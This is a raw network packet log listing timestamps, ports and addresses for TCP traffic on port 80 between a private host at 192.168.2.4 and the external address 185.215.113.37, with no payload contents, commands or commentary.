Sep 28, 2024 21:26:15.050383091 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.050409079 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.050443888 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.050628901 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.050638914 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.050666094 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.050692081 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.050692081 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.050704956 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.050714016 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.050721884 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.050729990 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.050733089 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.050745010 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.050750971 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.050781965 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.050811052 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.118633032 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.118681908 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.118694067 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.118709087 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.118786097 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.118786097 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.118841887 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.118851900 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.118860006 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.118870020 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.118897915 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.118937969 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.119437933 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.119478941 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.119489908 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.119491100 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.119520903 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.119556904 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.119626045 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.119636059 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.119645119 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.119653940 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.119663954 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.119680882 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.119713068 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.119798899 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.119816065 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.119848013 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.119878054 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.119935036 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.119944096 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.119952917 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.119990110 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.120021105 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.120066881 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.120076895 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.120115042 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.120277882 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.120347023 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.120347977 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.120357037 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.120409012 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.120409012 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.120460033 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.120469093 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.120479107 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.120513916 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.120546103 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.120620012 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.120630026 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.120661020 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.120671034 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.120676994 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.120682001 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.120693922 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.120696068 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.120724916 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.120754957 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.120942116 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.120991945 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.121041059 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.121052027 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.121059895 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.121068954 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.121078014 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.121088028 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.121092081 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.121104002 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.121114969 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.121166945 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.121166945 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.121500015 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.121509075 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.121519089 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.121527910 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.121537924 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.121546984 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.121548891 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.121557951 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.121567965 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.121573925 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.121578932 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.121592999 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.121628046 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.121628046 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.121916056 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.121927023 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.121936083 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.121944904 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.121957064 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.121973991 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.122004986 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.122200012 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.122210026 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.122217894 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.122226000 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.122236013 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.122246027 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.122256994 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.122268915 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.122276068 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.122308969 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.122325897 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.122596979 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.122606993 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.122616053 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.122627020 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.122658014 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.122689009 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.221973896 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.226861000 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.448934078 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.448954105 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.448964119 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.448973894 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.448983908 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.448992968 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.449001074 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.449024916 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.449026108 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.449074984 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.449132919 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.449177027 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.449251890 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.449266911 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.449278116 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.449287891 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.449299097 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.449301958 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.449301958 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.449309111 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.449321985 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.449347019 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.449377060 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.449558973 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.449569941 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.449579000 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.449610949 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.449640036 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.449713945 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.449723959 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.449733019 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.449767113 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.449768066 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.449865103 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.449875116 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.449883938 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.449898005 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.449914932 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.449923038 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.449923038 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.449928045 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.449939966 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.449947119 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.449949980 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.449965000 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.449990988 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.450249910 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.450259924 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.450269938 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.450303078 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.450334072 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.450406075 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.450417042 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.450426102 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.450436115 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.450444937 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.450454950 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.450455904 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.450467110 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.450473070 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.450479984 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.450490952 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.450494051 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.450500965 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.450511932 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.450512886 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.450536013 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.450555086 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.451169014 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.451179981 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.451190948 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.451200008 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.451210022 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.451216936 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.451219082 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.451231003 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.451241970 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.451251984 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.451257944 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.451257944 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.451262951 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.451273918 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.451284885 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.451284885 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.451291084 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.451303959 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.451307058 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.451313972 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.451328039 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.451329947 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.451355934 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.451376915 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.451802969 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.451812983 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.451822996 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.451832056 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.451869965 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.451869965 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.451952934 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.451998949 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.452100039 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.452110052 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.452117920 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.452127934 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.452146053 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.452156067 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.452166080 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.452167034 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.452167034 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.452176094 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.452187061 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.452195883 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.452195883 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.452198029 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.452208996 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.452215910 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.452219963 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.452229977 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.452239037 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.452240944 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.452251911 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.452260971 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.452261925 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.452277899 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.452300072 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.453061104 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.453071117 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.453084946 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.453094959 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.453104973 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.453110933 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.453110933 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.453114986 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.453125000 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.453131914 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.453135014 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.453145981 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.453151941 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.453155994 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.453167915 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.453172922 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.453177929 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.453188896 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.453193903 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.453198910 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.453211069 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.453212023 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.453222990 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.453234911 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.453236103 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.453236103 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.453258038 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.453283072 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.453963995 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.453973055 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.453986883 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.453996897 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.454005003 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.454015017 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.454015017 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.454025030 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.454035997 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.454035997 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.454046011 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.454056978 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.454066038 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.454072952 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.454072952 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.454076052 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.454087019 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.454094887 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.454097033 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.454108953 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.454118967 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.454121113 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.454138994 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.454160929 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.454710007 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.454721928 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.454756021 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.454787970 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.541534901 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.541544914 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.541554928 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.541609049 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.541671038 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.541671038 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.541708946 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.541742086 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.541783094 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.541853905 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.541865110 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.541897058 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.541917086 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.541917086 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.541930914 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.541939974 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.541949987 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.541968107 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.541968107 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.542011976 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.542179108 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.542190075 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.542202950 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.542212009 CEST	80	49732	185.215.113.37	192.168.2.4
